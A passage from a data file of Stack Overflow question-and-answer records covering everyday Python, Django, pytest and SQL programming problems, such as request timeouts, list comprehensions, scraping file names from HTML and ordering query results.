['00001740 n 3 eintiteas aon\xc3\xa1n beith 003 ', ' 00001930 n 0000 ~ 00002137 n 0000 ~ 04424418 n 0000']
``` | Take a look at [re.split](http://docs.python.org/2/library/re.html#re.split). It works like the regular split but accepts a regular expression.
Example:
```
import re
string = "00001740 n 3 eintiteas aonán beith 003 @ 00001930 n 0000 ~ 00002137 n 0000 ~ 04424418 n 0000"
print(re.split(r'\@|\~|\+|\#p|\#m|\%p|\=', string, 1))
``` | Split a line at the first special character Python | [
"python"
] |
I'm writing selenium tests, with a set of classes, each class containing several tests. Each class currently opens and then closes Firefox, which has two consequences:
* super slow, opening firefox takes longer than running the test in a class...
* crashes, because after firefox has been closed, trying to reopen it really quickly, from selenium, results in an 'Error 54'
I could solve the error 54, probably, by adding a sleep, but it would still be super slow.
So, what I'd like to do is reuse the same Firefox instances across *all* test classes. Which means I need to run a method before all test classes, and another method after all test classes. So, 'setup\_class' and 'teardown\_class' are not sufficient. | You might want to use a session-scoped "autouse" fixture:
```
# content of conftest.py or a tests file (e.g. in your tests or root directory)
@pytest.fixture(scope="session", autouse=True)
def do_something(request):
# prepare something ahead of all tests
request.addfinalizer(finalizer_function)
```
This will run ahead of all tests. The finalizer will be called after the last test has finished. | Using a session fixture as suggested by [hpk42](https://stackoverflow.com/a/17844938/347181) is a great solution for many cases,
but the fixture will run only after all tests have been collected.
Here are two more solutions:
### conftest hooks
Write a [`pytest_configure`](https://docs.pytest.org/en/latest/reference/reference.html#pytest.hookspec.pytest_configure) or [`pytest_sessionstart`](https://docs.pytest.org/en/latest/reference/reference.html#pytest.hookspec.pytest_sessionstart) hook in your `conftest.py` file(see where to put conftest.py file [here](https://stackoverflow.com/a/34520971/248616))
```
# content of conftest.py
def pytest_configure(config):
"""
Allows plugins and conftest files to perform initial configuration.
This hook is called for every plugin and initial conftest
file after command line options have been parsed.
"""
def pytest_sessionstart(session):
"""
Called after the Session object has been created and
before performing collection and entering the run test loop.
"""
def pytest_sessionfinish(session, exitstatus):
"""
Called after whole test run finished, right before
returning the exit status to the system.
"""
def pytest_unconfigure(config):
"""
called before test process is exited.
"""
```
### pytest plugin
Create a [pytest plugin](https://docs.pytest.org/en/latest/writing_plugins.html) with `pytest_configure` and `pytest_unconfigure` hooks.
Enable your plugin in `conftest.py`:
```
# content of conftest.py
pytest_plugins = [
'plugins.example_plugin',
]
# content of plugins/example_plugin.py
def pytest_configure(config):
pass
def pytest_unconfigure(config):
pass
``` | How to run a method before all tests in all classes? | [
"",
"python",
"selenium",
"pytest",
""
] |
In my script, `requests.get` never returns:
```
import requests
print ("requesting..")
# This call never returns!
r = requests.get(
"http://www.some-site.example",
proxies = {'http': '222.255.169.74:8080'},
)
print(r.ok)
```
What could be the possible reason(s)? Any remedy? What is the default timeout that `get` uses? | > What is the default timeout that get uses?
The default timeout is `None`, which means it'll wait (hang) until the connection is closed.
Just [specify a timeout value](https://requests.readthedocs.io/en/latest/user/advanced/#timeouts), like this:
```
r = requests.get(
'http://www.example.com',
proxies={'http': '222.255.169.74:8080'},
timeout=5
)
``` | From [requests documentation](http://docs.python-requests.org/en/latest/user/quickstart/#timeouts):
> You can tell Requests to stop waiting for a response after a given
> number of seconds with the timeout parameter:
>
> ```
> >>> requests.get('http://github.com', timeout=0.001)
> Traceback (most recent call last):
> File "<stdin>", line 1, in <module>
> requests.exceptions.Timeout: HTTPConnectionPool(host='github.com', port=80): Request timed out. (timeout=0.001)
> ```
>
> Note:
>
> timeout is not a time limit on the entire response download; rather,
> an exception is raised if the server has not issued a response for
> timeout seconds (more precisely, if no bytes have been received on the
> underlying socket for timeout seconds).
It happens a lot to me that `requests.get()` takes a very long time to return even if the `timeout` is 1 second. There are a few ways to overcome this problem:
**1. Use the `TimeoutSauce` internal class**
From: <https://github.com/kennethreitz/requests/issues/1928#issuecomment-35811896>
> ```
> import requests
> from requests.adapters import TimeoutSauce
>
> class MyTimeout(TimeoutSauce):
> def __init__(self, *args, **kwargs):
> if kwargs['connect'] is None:
> kwargs['connect'] = 5
> if kwargs['read'] is None:
> kwargs['read'] = 5
> super(MyTimeout, self).__init__(*args, **kwargs)
>
> requests.adapters.TimeoutSauce = MyTimeout
> ```
>
> This code should cause us to set the read timeout as equal to the
> connect timeout, which is the timeout value you pass on your
> Session.get() call. (Note that I haven't actually tested this code, so
> it may need some quick debugging, I just wrote it straight into the
> GitHub window.)
**2. Use a fork of requests from kevinburke:** <https://github.com/kevinburke/requests/tree/connect-timeout>
From its documentation: <https://github.com/kevinburke/requests/blob/connect-timeout/docs/user/advanced.rst>
> If you specify a single value for the timeout, like this:
>
> ```
> r = requests.get('https://github.com', timeout=5)
> ```
>
> The timeout value will be applied to both the connect and the read
> timeouts. Specify a tuple if you would like to set the values
> separately:
>
> ```
> r = requests.get('https://github.com', timeout=(3.05, 27))
> ```
NOTE: [The change has since been merged to the main Requests project](https://github.com/kennethreitz/requests/pull/1801).
**3. Using `evenlet` or `signal` as already mentioned in the similar question:**
[Timeout for python requests.get entire response](https://stackoverflow.com/questions/21965484/timeout-for-python-requests-get-entire-response) | Why doesn't requests.get() return? What is the default timeout that requests.get() uses? | [
"",
"python",
"get",
"python-requests",
""
] |
```
n = [3, 5, 7]
def double(lst):
for x in lst:
x *= 2
print x
return lst
print double(n)
```
Why doesn't this return `n = [6, 10, 14]`?
There should also be a better solution that looks something like `[x *=2 for x in lst]` but it doesn't work either.
Any other tips about for-loops and lists would be much appreciated. | > Why doesn't this return `n = [6, 10, 14]`?
Because `n`, or `lst` as it is called inside `double`, is never modified. `x *= 2` is equivalent to `x = x * 2` for numbers `x`, and that only re-binds the *name* `x` without changing the object it references.
To see this, modify `double` as follows:
```
def double(lst):
for i, x in enumerate(lst):
x *= 2
print("x = %s" % x)
print("lst[%d] = %s" % (i, lst[i]))
```
To change a list of numbers in-place, you have to reassign its elements:
```
def double(lst):
for i in xrange(len(lst)):
lst[i] *= 2
```
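For reference, here is the in-place version run on the list from the question (a Python 3 sketch, using `range` where the code above uses Python 2's `xrange`):

```
def double(lst):
    # reassign each element, so the list object itself is modified
    for i in range(len(lst)):
        lst[i] *= 2

n = [3, 5, 7]
double(n)
print(n)  # [6, 10, 14]
```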
If you don't want to modify it in-place, use a comprehension:
```
def double(lst):
return [x * 2 for x in lst]
``` | ```
n = [3, 5, 7]
def double(lst):
for x in lst:
x *= 2
print x # item value changed and printed
return lst # original lst returned
print double(n)
```
You only modified the item's value inside the loop and printed it, but returned the original `lst`.
`[x *=2 for x in lst]` is invalid syntax; the correct way to write it is `[x*2 for x in lst]`.
Another way is to use lambda with map:
```
print(list(map(lambda x:x*2,[1,2,3])))
```
Note: `print((lambda x:x*2)([1,2,3]))` gives the wrong answer; it outputs `[1, 2, 3, 1, 2, 3]`, the same as doing `[1,2,3]*2`. | How to double all the values in a list | [
"",
"python",
"list",
"for-loop",
""
] |
I am learning Python from Code Academy, and I'm trying to complete their review assignment.
I am supposed to define a function, then set up an if/else check on the type of input I get, and return either the absolute value of an int/float or an error message.
I tried to look at similar questions, but the code in those answers is a lot more complicated than I can understand O_O. I looked at the function module lessons again, and I think I followed the function-making pattern correctly? Is there supposed to be an extra line before I call the function? When I try to keep going, I get this same error message in the other exercises.
I would appreciate any responses :)
```
def distance_from_zero(thing):
thing = input
if type(thing) != int or float:
return "Not an integer or float!"
else:
return abs(thing)
distance_from_zero(thing)
``` | Are you trying to use the `input` function to get a value from the user?
If so, you must add parentheses to it:
```
thing = input()
# If you're using python 2.X, you should use raw_input instead:
# thing = raw_input()
```
Also, you don't need the input parameter if that's what you're trying to do.
If you do mean `input` to be a parameter, then you're trying to use variables before defining them. `distance_from_zero(thing)` can't work since `thing` hasn't been defined outside your function, so you should either define that variable first or call it with a literal value:
```
thing = 42
distance_from_zero(thing)
# or
distance_from_zero(42)
``` | You did not define `thing`. Please try:
```
def distance_from_zero(thing):
if type(thing) != int or float:
return "Not an integer or float!"
else:
return abs(thing)
thing = 1
distance_from_zero(thing)
```
Or did you mean this, accepting user input?
```
def distance_from_zero():
thing = int(input())
if type(thing) != int or float:
return "Not an integer or float!"
else:
return abs(thing)
distance_from_zero()
```
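For illustration, here is why the `type(thing) != int or float` test in this code never fails (a small, self-contained sketch):

```
x = 3
cond = type(x) != int or float      # parses as (type(x) != int) or float
print(bool(cond))                   # True even though x IS an int
print(isinstance(x, (int, float)))  # True -- the correct way to test
```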
Also, your condition `if type(thing) != int or float:` will always evaluate to `True`, because it parses as `if (type(thing) != int) or float`. Change it to `if not isinstance(thing, (int, float)):`. | how do i fix a "NameError: name 'thing' is not defined" when calling a function ? | [
"",
"python",
"function",
""
] |
I am trying to register a new user on the site,
```
class UserInfo(models.Model):
user = models.ForeignKey(User,primary_key=True)#user profile
email_id=models.CharField(max_length=32, null=True, blank=True)
```
When I am registering the user, I get stuck on an **IntegrityError**; please help me resolve the problem.
```
def registration(request):
registration_dict = {}
if 1==1 :
#if request.POST:
#username=request.POST['email']
#password=request.POST['password']
username="admin@admin.com"
password='123456'
#try:
UserInfo.objects.get_or_create(email_id=username,user__username=username,user__email=username,user__password=password)
#except:
# registration_dict["status"]="0"
# registration_dict["message"]="Username already present"
# return HttpResponse(simplejson.dumps(registration_dict),content_type="application/json")
registration_dict["status"]="1"
registration_dict["message"]="Thank You for registering"
return HttpResponse(simplejson.dumps(registration_dict),content_type="application/json")
else:
registration_dict["status"]="0"
registration_dict["message"]="Unable to process the request"
return HttpResponse(simplejson.dumps(registration_dict),content_type="application/json")
```
**EDIT 1**
I have tried changing
`UserInfo.objects.get_or_create(email_id=username,user__username=username,user__email=username,user__password=password,user_id=1)`
and then the error changes, to
```
'Cannot add or update a child row: a foreign key constraint fails (`app_info`.`appdata_userinfo`, CONSTRAINT `user_id_refs_id_b0fd803b` FOREIGN KEY (`user_id`) REFERENCES `auth_user` (`id`))')
``` | From the limited information, I would say the problem is
that no matching `UserInfo` is found. It then tries to create a new `UserInfo`, but it has no `User` to assign to the `user` ForeignKey. I would suggest the following:
```
from django.contrib.auth import authenticate
from django.contrib.auth.models import User

user = authenticate(username=email, password=password)
if user is None:
    # create_user hashes the password and saves the new User row
    user = User.objects.create_user(username=email, email=email, password=password)
user_info = UserInfo.objects.get_or_create(user=user, email_id=email)
``` | If the original User object doesn't exist, you'll run into all kinds of problems. So, you need to break the process down into two steps.
1. Check if a `User` object exists or not, if it doesn't create it.
2. Check if a `UserInfo` object exists *for that user*, if it doesn't create it.
As there is a `ForeignKey`, you cannot do it in one step:
```
username = "admin@admin.com"
password = '123456'
obj, created = User.objects.get_or_create(username=username)
obj.set_password(password) # the proper way to set the password
obj.save()
# Now fetch or create a UserInfo object
info, created = UserInfo.objects.get_or_create(email_id=username,user=obj)
``` | IntegrityError - Column 'user_id' cannot be null | [
"",
"python",
"django",
"django-views",
""
] |
I am running the following sql query in my web app:
```
SELECT EXISTS (
SELECT id
FROM user
WHERE membership=1244)
```
I was expecting **true** (boolean data) as the result, but I'm getting 't' for true or 'f' for false.
How do I get it to return to my lua code a standard boolean?
I found the following post:
[Reading boolean correctly from Postgres by PHP](https://stackoverflow.com/questions/1314489/reading-boolean-correctly-from-postgres-by-php)
And so I tried to change my code to something like this:
```
SELECT EXISTS ::int (
SELECT id
FROM user
WHERE membership=1244)
```
or
```
SELECT ::INT (SELECT EXISTS (
SELECT id
FROM user
WHERE membership=1244))
```
But I'm getting a syntax error.
Can you tell the best way to handle this? Should I be casting the resulting 't' to a boolean somehow? or is there a way to tell postgresql to return true / false instead of 't'/'f'?
Thanks. | You are so close
```
SELECT EXISTS (SELECT id FROM user WHERE membership=1244)::int
``` | Your first query does indeed return a boolean; `t` is just how the returned value is displayed:
```
select exists (select 1);
exists
--------
t
```
But if you check its type it is a boolean:
```
select pg_typeof(exists (select 1));
pg_typeof
-----------
boolean
```
You will have to check your Lua PostgreSQL driver's manual for how to handle it properly. | checking for boolean true / false result in postgresql query | [
"",
"sql",
"postgresql",
"lua",
""
] |
When working with `simplejson` in Django, I sometimes need to send the information strictly in order.
```
values = {"entry1":"value1","entry2":"value2","entry3":"value3"}
return HttpResponse(simplejson.dumps(values),content_type="application/json")
```
That's what it returns
```
{"entry2": "value2", "entry3": "value3", "entry1": "value1"}
```
But I want it to returns this instead:
```
{"entry1":"value1","entry2":"value2","entry3":"value3"}
```
How can I send the information in order in `simplejson`? | > I sometimes need to send the information strictly in order.
Don't use a dictionary then, use a list of tuples:
```
values = [("entry1", "value1"), ("entry2", "value2"), ("entry3", "value3")]
```
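Serialized with the stdlib `json` module (same interface as `simplejson`), the list keeps its order; each tuple becomes a two-element JSON array:

```
import json

values = [("entry1", "value1"), ("entry2", "value2"), ("entry3", "value3")]
print(json.dumps(values))
# [["entry1", "value1"], ["entry2", "value2"], ["entry3", "value3"]]
```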
Dictionaries *and* JSON objects do not have a set order. Neither will preserve your input order, nor are they required to.
To quote the [JSON RFC](https://www.rfc-editor.org/rfc/rfc4627):
> An object is an unordered collection of zero or more name/value pairs [...]
and the Python [`dict.items()`](http://docs.python.org/2/library/stdtypes.html#dict.items) documentation:
> Keys and values are listed in an arbitrary order which is non-random, varies across Python implementations, and depends on the dictionary's history of insertions and deletions. | The traditional way of solving this is with a 2-dimensional tuple/list, as suggested by Martijn Pieters.
A more Pythonic way of accomplishing this, however, is to use an `OrderedDict`.
For similar question/solution see:
[Can I get JSON to load into an OrderedDict in Python?](https://stackoverflow.com/questions/6921699/can-i-get-json-to-load-into-an-ordereddict-in-python)
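A minimal sketch of that approach; the stdlib `json` module (and `simplejson`) serializes an `OrderedDict` in insertion order:

```
import json
from collections import OrderedDict

values = OrderedDict([("entry1", "value1"), ("entry2", "value2"), ("entry3", "value3")])
print(json.dumps(values))
# {"entry1": "value1", "entry2": "value2", "entry3": "value3"}
```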
For OrderedDict documentation see: <http://docs.python.org/2/library/collections.html#collections.OrderedDict> | simplejson returns values not in order | [
"",
"python",
"django",
"json",
"simplejson",
""
] |
```
SELECT TOP 4000 Users.Id
FROM Users
JOIN Streams ON Users.Id = Streams.UserId
JOIN Playlists ON Streams.Id = Playlists.StreamId
WHERE Playlists.FirstItemId = '00000000-0000-0000-0000-000000000000'
// Doesn't work
HAVING COUNT(1) = (
SELECT COUNT(Playlists.Id)
FROM Playlists WHERE Playlists.StreamId = Streams.Id
)
```
I'm trying to select all Users who have only Streams with 1 Playlist and whose 1 Playlist has a FirstItemId of Guid.Empty. I'm trying to do some database maintenance and remove accounts which were created but never used.
I've got the first part of the query working pretty well, but I'm not sure how I can apply my 'having only 1 child' filter properly. | Try the query below to filter out the inactive users:
```
SELECT TOP 4000 Users.Id
FROM Users
JOIN Streams ON Users.Id = Streams.UserId
JOIN Playlists ON Streams.Id = Playlists.StreamId
WHERE Playlists.FirstItemId = '00000000-0000-0000-0000-000000000000'
AND (SELECT COUNT(Playlists.Id) FROM Playlists WHERE Playlists.StreamId = Streams.Id) =1
``` | I think you can accomplish this pretty easily with a WHERE NOT EXISTS clause
```
SELECT TOP 4000 Users.Id
FROM Users
JOIN Streams ON Users.Id = Streams.UserId
JOIN Playlists ON Streams.Id = Playlists.StreamId
WHERE Playlists.FirstItemId = '00000000-0000-0000-0000-000000000000'
  AND NOT EXISTS (
    SELECT 1 FROM Playlists p2
    WHERE p2.StreamId = Streams.Id
      AND p2.Id <> Playlists.Id
  )
``` | Select only parents with one child | [
"",
"sql",
"sql-server",
""
] |
Have the table:
```
Game
----------
ID
UploadDate
LastUpdate
```
Where `UploadDate` is the date the game was uploaded, and `LastUpdate` is the date of the last update for the game.
New games will have `UploadDate == LastUpdate`.
I want to return `Most recently updated games`. They should be ordered by `LastUpdate` descending, but if `UploadDate == LastUpdate` they should be pushed to the bottom of the list.
I've tried:
```
ORDER BY UploadDate <> LastUpdate, LastUpdate DESC
```
But the syntax is incorrect. Can anyone help me with this order by query? | The syntax you are using is appropriate for MySQL. The following works in almost all databases:
```
ORDER BY (case when UploadDate <> LastUpdate then 1 else 0 end) desc, LastUpdate DESC
``` | You're very close - the order by clause needs values to order by - not boolean conditions. Instead, you can wrap the condition in a CASE statement, for example:
```
ORDER BY CASE WHEN UploadDate <> LastUpdate THEN 0 ELSE 1 END ASC, LastUpdate DESC
``` | SQL Order by where dates not equal | [
"",
"sql",
"sql-server",
"sql-order-by",
""
] |
The inverse of this question (finding a string in a list) is so popular, that I wasn't able to find an answer to my question.
```
black_list = ["ab:", "cd:", "ef:", "gh:"]
for line in some_file:
if ":" in line and black_list not in line:
pass
```
This obviously doesn't work. Some iteration over the list needs to happen that returns true/false, but I don't know how to accomplish that elegantly. Thanks. | The builtin [`any()`](http://docs.python.org/2/library/functions.html#any) function can help you here:
```
black_list = ["ab:", "cd:", "ef:", "gh:"]
for line in some_file:
if ":" in line and not any(x in line for x in black_list):
pass
```
It's also possible to get the same effect with [`all()`](http://docs.python.org/2/library/functions.html#all):
```
for line in some_file:
if ":" in line and all(x not in line for x in black_list):
pass
```
... but I think the first is closer to English, so easier to follow. | Your example code makes it look like you're looking for an element in a file, not just in a string. Regardless, you could do something like this, which illustrates doing both with the built-in `any()` function:
```
def check_string(text, word_list):
return any(phrase in text for phrase in word_list)
def check_file(filename, word_list):
with open(filename) as some_file:
return any(check_string(line, word_list) for line in some_file)
black_list = ["ab:", "cd:", "ef:", "gh:"]
print check_file('some_file.txt', black_list)
``` | How to check if elements of a list are in a string | [
"",
"python",
"string",
"list",
"if-statement",
"element",
""
] |
I am trying to modify a string by replacing each letter with the letter two positions ahead of it, e.g. 'a' replaced by 'c' and 'b' replaced by 'd'. The only exceptions are 'y', which should be replaced by 'a', and 'z' by 'b' (it loops back to the start).
I have written the following code for it, which seems to serve the purpose, but the output formatting kind of spoils it.
```
string = "g fmnc wms bgblr rpylqjyrc gr zw fylb."
print string
for i in string:
if i.isalpha():
if ord(i)>120:
print chr(ord(i)-24),
else:
print chr(ord(i)+2),
else:
print i
```
**Output :**
```
g fmnc wms bgblr rpylqjyrc gr zw fylb.
i h o p e y o u d i d n t t r a n s l a t e i t b y h a n d .
```
**Expected Output:**
```
g fmnc wms bgblr rpylqjyrc gr zw fylb.
i hope you didnt translate it by hand.
```
Is there any alternative, quicker approach to solve this? | The `print i,` syntax adds a space at the end of the thing that's being printed. You could solve this by putting all your characters in a list and `''.join()`ing them in the end:
```
string = "g fmnc wms bgblr rpylqjyrc gr zw fylb."
print string
answer = []
for i in string:
if i.isalpha():
if ord(i)>120:
answer.append(chr(ord(i)-24))
else:
answer.append(chr(ord(i)+2))
else:
answer.append(i)
print ''.join(answer)
```
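For reference, in Python 3 the whole loop collapses into a single translation table (a sketch using `str.maketrans`):

```
from string import ascii_lowercase as lc

shift2 = str.maketrans(lc, lc[2:] + lc[:2])  # a->c, b->d, ..., y->a, z->b
s = "g fmnc wms bgblr rpylqjyrc gr zw fylb."
print(s.translate(shift2))  # i hope you didnt translate it by hand.
```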
Of course, as others have suggested, `string.translate` will likely be far more straightforward. | Here is a solution using `string.translate`:
```
from string import maketrans, ascii_lowercase
s='g fmnc wms bgblr rpylqjyrc gr zw fylb.'
rot2=maketrans(
ascii_lowercase,
ascii_lowercase[2:]+ascii_lowercase[:2]
)
print s.translate(rot2)
``` | String Manipulation Python | [
"",
"python",
"string",
"python-2.6",
""
] |
Given that we have an HTML file as shown below:
```
</pre>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a>
<img src="/icons/unknown.gif" alt="[ ]"> <a href="AAAAAAA.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="AAAAAAA.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K
<img src="/icons/image2.gif" alt="[IMG]"> <a href="BBBBB.AAAAAAAA.txt">BBBBB.AAAAAAAA.txt</a> 16-Jan-2008 15:01 1.6K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="js421254.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="js421254.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K
...
...
...
<img src="/icons/image2.gif" alt="[IMG]"> <a href="BBdBBB.AAAAsaAAAA.txt">BBBBB.AAAAAAAA.txt</a> 16-Jan-2008 15:01 1.6K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="52542.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]"> <a href="52542.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K
<hr></pre>
</body></html>
```
How is it possible to make a new text file containing the characters as shown below:
Expected result:
```
AAAAAAA.jpg
js421254.jpg
...
...
...
52542.jpg
``` | I hope this regex generalizes correctly:
```
import re

with open('path/to/file') as infile, open('/path/to/output', 'w') as outfile:
    for line in infile:
        if 'alt="[ ]"' in line:
            hrefs = re.findall(r'<a\s+href=.*?</a>', line)
            for href in hrefs:
                target = href.split('=', 1)[1].split('>', 1)[0].strip('"')
                outfile.write('%s\n' % target)
```
Hope this helps | [BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/) is good for webscraping:
```
from BeautifulSoup import BeautifulSoup
soup = BeautifulSoup("""<img src="/icons/blank.gif" alt="Icon ">
<a href="?C=N;O=D">Name</a>
<img src="/icons/unknown.gif" alt="[ ]">
<a href="AAAAAAA.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]">
<a href="AAAAAAA.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K
<img src="/icons/image2.gif" alt="[IMG]">
<a href="BBBBB.AAAAAAAA.txt">BBBBB.AAAAAAAA.txt</a> 16-Jan-2008 15:01 1.6K
<img src="/icons/unknown.gif" alt="[ ]">
<a href="js421254.jpg">AAAAAAA.jpg</a> 16-Jan-2008 01:27 827K
<img src="/icons/unknown.gif" alt="[ ]">
<a href="js421254.jpg.xml">AAAAAAA.jpg.xml</a> 16-Jan-2008 01:28 12K""")
>>> for a in soup.findAll('a'):
... if str(a.text).strip().lower().endswith('jpg'): print a.text
...
AAAAAAA.jpg
AAAAAAA.jpg
>>>
>>> for a in soup.findAll('a'):
... if a.get('href').strip().lower().endswith('jpg'): print a.get('href')
...
AAAAAAA.jpg
js421254.jpg
```
If you want pure Python and your use case is simple enough, you can try regular expressions. This is trickier because in the real world there are a lot of corner cases and malformed HTML out there.
```
import re
>>> for match in re.findall(r'<a .+?>(.+?)</a>', html):
... if match.strip().lower().endswith('jpg'): print match
...
AAAAAAA.jpg
AAAAAAA.jpg
>>>
```
Or this if you are looking at the `href` attribute:
```
>>> for match in re.findall(r'<a href="(.+?)">', html):
... if match.lower().endswith('jpg'): print match
...
AAAAAAA.jpg
js421254.jpg
```
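One caveat worth spelling out: the `?` in `.+?` makes the quantifier non-greedy. Without it, `.+` runs all the way to the last quote on the line (a small sketch):

```
import re

s = '<a href="a.jpg">x</a> <a href="b.jpg">y</a>'
print(re.findall(r'href="(.+?)"', s))  # ['a.jpg', 'b.jpg']
print(re.findall(r'href="(.+)"', s))   # ['a.jpg">x</a> <a href="b.jpg']
```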
If you are just scraping something simple like porn sites you should get good results with regular expressions.
> could you please explain me str(a.text).strip().lower().endswith('jpg')? – guava
* **strip**: this method returns the string without spaces (including tabs and newlines) that occur at the start or end of the string
* **lower**: converts to lower case (so you don't need to test for all the case variations like JPG, jpg, Jpg).
* **endswith**: returns True if the string ends with the argument you provide (the thing you are looking for).
> thank you @Paulo Scardine i also could not understand `re.findall(r'<a href="(.+?)">'`, – guava
Well, the `re` module is Python's implementation of [regular expressions](http://docs.python.org/2/library/re.html) - a vast subject that has books larger than bibles about it (OK, maybe larger than the new testament). I will not pretend I can scratch the surface of it in a stackoverflow answer.
First thing you may find strange is the `r` in front of the quotes. It is a [raw string literal](http://docs.python.org/release/2.5.2/ref/strings.html), a string where you don't have to escape the `\` because unlike regular strings, the backslash has no special meaning inside raw strings (backslashes are used all the time in regular expressions, it just occurred to me that I'm not using patterns with backslashes in this case - the power of the habit...)
Now to the expression: the `()` mark the group you want to capture. The dot means any character, the plus sign means one or more of them, and the `?` means the search is not greedy (the default is a greedy search where the `.+` would match any character, including the quotes). Just try the same expression without the `?` and you will understand what happens. | Extracting some data from an HTML file and writing it to another file | [
"",
"python",
"python-2.7",
"python-3.x",
""
] |
I want to iterate through a dictionary in python by index number.
Example :
```
dict = {'apple':'red','mango':'green','orange':'orange'}
```
I want to iterate through the dictionary from first to last, so that I can access the dictionary items by their indexes. For example, the 1st item will be apple, and the 2nd item will be mango and value will be green.
Something like this:
```
for i in range(0,len(dict)):
dict.i
``` | I can't think of any reason why you would want to do that. If you just need to iterate over the dictionary, you can just do:
```
for key, elem in testDict.items():
print key, elem
```
**OR**
```
for i in testDict:
print i, testDict[i]
``` | You can iterate over keys and get values by keys:
```
for key in dict.iterkeys():
print key, dict[key]
```
You can iterate over keys and corresponding values:
```
for key, value in dict.iteritems():
print key, value
```
You can use `enumerate` if you want indexes (remember that dictionaries don't have an order):
```
>>> for index, key in enumerate(dict):
... print index, key
...
0 orange
1 mango
2 apple
>>>
``` | Python Iterate Dictionary by Index | [
"",
"python",
"dictionary",
""
] |
I have a table with Cities and States; it looks something like:
```
cityid |city |stateid |state
--------------------------------------
0566 |abriaqui|05 |antioquia
0599 |alejand |05 |antioquia
0511 |another |05 |antioquia
0782 |dummy1 |09 |caldas
0783 |dummy2 |09 |caldas
0785 |dummy3 |09 |caldas
0788 |dummy4 |03 |Narino
0767 |dummy5 |03 |Narino
0734 |dummy6 |03 |Narino
```
As you can see I have Cities with unique IDs, and the state they belong to is just to the right, with the state id and the state name. I would like to make a query that returns something similar to DISTINCT(state):
```
STATE
--------------------
antioquia
caldas
narino
```
But I need the stateid too. How can I reach this? | Just do something like this:
```
SELECT DISTINCT state, stateid
FROM table
``` | Try this way:
```
select distinct state, stateid
from tab
```
You can also use a `group by` clause:
```
select state, stateid
from tab
group by state, stateid
```
`GROUP BY` is useful if you also need an aggregate function.
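A quick way to sanity-check either query is Python's built-in `sqlite3` with a few of the sample rows (`tab` stands in for your real table name):

```
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE tab (cityid TEXT, city TEXT, stateid TEXT, state TEXT)")
con.executemany("INSERT INTO tab VALUES (?, ?, ?, ?)", [
    ("0566", "abriaqui", "05", "antioquia"),
    ("0599", "alejand", "05", "antioquia"),
    ("0782", "dummy1", "09", "caldas"),
])
rows = con.execute("SELECT DISTINCT state, stateid FROM tab").fetchall()
print(sorted(rows))  # [('antioquia', '05'), ('caldas', '09')]
```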
Which solution fits depends on your requirements. | Use DISTINCT with two columns (or something that works) | [
"",
"sql",
"distinct",
""
] |
I have seen questions similar to this but not quite the same. I have an expression
```
if foo == ....
return -1
elif myFunction(bar) != -1:
return myFunction(bar)
elif ...
```
I don't want to calculate `myFunction(bar)` twice. If it were simply an `if`, I could do
```
temp = myFunction(bar)
if temp != -1
return temp
```
However, doing this with an `elif` would result in an unnecessary calculation of `temp` whenever we follow the initial `if`.
I can see a solution using an
```
if ...
else
temp = myFunction(bar)
if temp != -1:
return temp
elif ...
```
But that now starts to become more ugly. Is there a better way to accomplish this? | If you do this a lot, it might pay to have a [memoizing decorator](http://wiki.python.org/moin/PythonDecoratorLibrary#Memoize) around. The only memoizer that is currently in the standard library (for newer Python 3.x) is `lru_cache`, which is overkill, but shows the general idea:
```
>>> def func():
... print("foo")
... return 1
...
>>> if func():
... print(func())
...
foo
foo
1
```
Now memoize `func`:
```
>>> from functools import lru_cache
>>> func = lru_cache(1)(func)
>>> if func():
... print(func())
...
foo
1
``` | If you do not want to call `myFunction(bar)` twice, then there is no way around storing the result in an intermediate variable. People here are proposing complex caching solutions for this; that can be convenient in extreme cases, but first let's get back to basics. You should make proper use of the fact that you return from within your conditional blocks: in these situations you can drop many `else`s. What follows is basically the code block from your question, but without dots, with proper indentation, and with names according to PEP 8:
```
if foo == "bar"
return -1
elif myfunction(bar) != -1:
return myfunction(bar)
else
return None
```
It can easily be replaced with:
```
if foo == "bar"
return -1
t = myfunction(bar)
if t != -1:
return t
return None
```
As already stated in another answer, you can call your function twice if it does not affect the performance of your code. The result would look as simple as
```
if foo == "bar"
return -1
if myfunction(bar) != -1:
return myfunction(bar)
return None
``` | Python assignment and test of function using elif | [
"",
"python",
"if-statement",
"variable-assignment",
""
] |
How would I go about telling whether my code runs in O(N) (linear) time, O(N^2) time, or something else? Practice tests online dock points for code that takes too long to compute.
I understand that it is best to have a script in which the time it takes to run is proportional to the length of input data only ( O(N) time ), and I am wondering if that is what my code is doing. And how could one tell how fast the code runs?
Below I included a script I wrote that I am concerned about. It is from a practice exam problem in which you are given a series of 'a's and 'b's and you are to compute the palindromes. So if you are given s = "baababa", there are 6 palindromes: 'aa', 'baab', 'aba', 'bab', 'ababa', & 'aba'.
```
def palindrome(s):
length = len(s)
last = len(s)-1
count = 0
for index, i in enumerate(s):
left=1
right=1
left2=1
right2=1
for j in range(0,index+1): #+1 because exclusive
if index-left2+1>=0 and index+right2<=last and s[index-left2+1]==s[index+right2]:
print s[index-left2+1:index+right2+1] #+1 because exclusive
left2 +=1
right2 +=1
count +=1
elif index-left>=0 and index+right<=last and s[index-left] == s[index+right]:
print s[index-left:index+right+1] #+1 because exclusive
left += 1
right +=1
count += 1
return count
```
Is this O(N) time? I loop through the entire list only once, but there is a smaller loop as well... | It's O(N^2).
You have one loop from 0 to N and a second loop that goes from 0 to i. Let's see how many operations you have to perform. For each 'i' we look at the size of the list, with j running from 0 to i + 1 (let's take N = 7):
```
i = 0 | x x _ _ _ _ _ _ -
i = 1 | x x x _ _ _ _ _ |
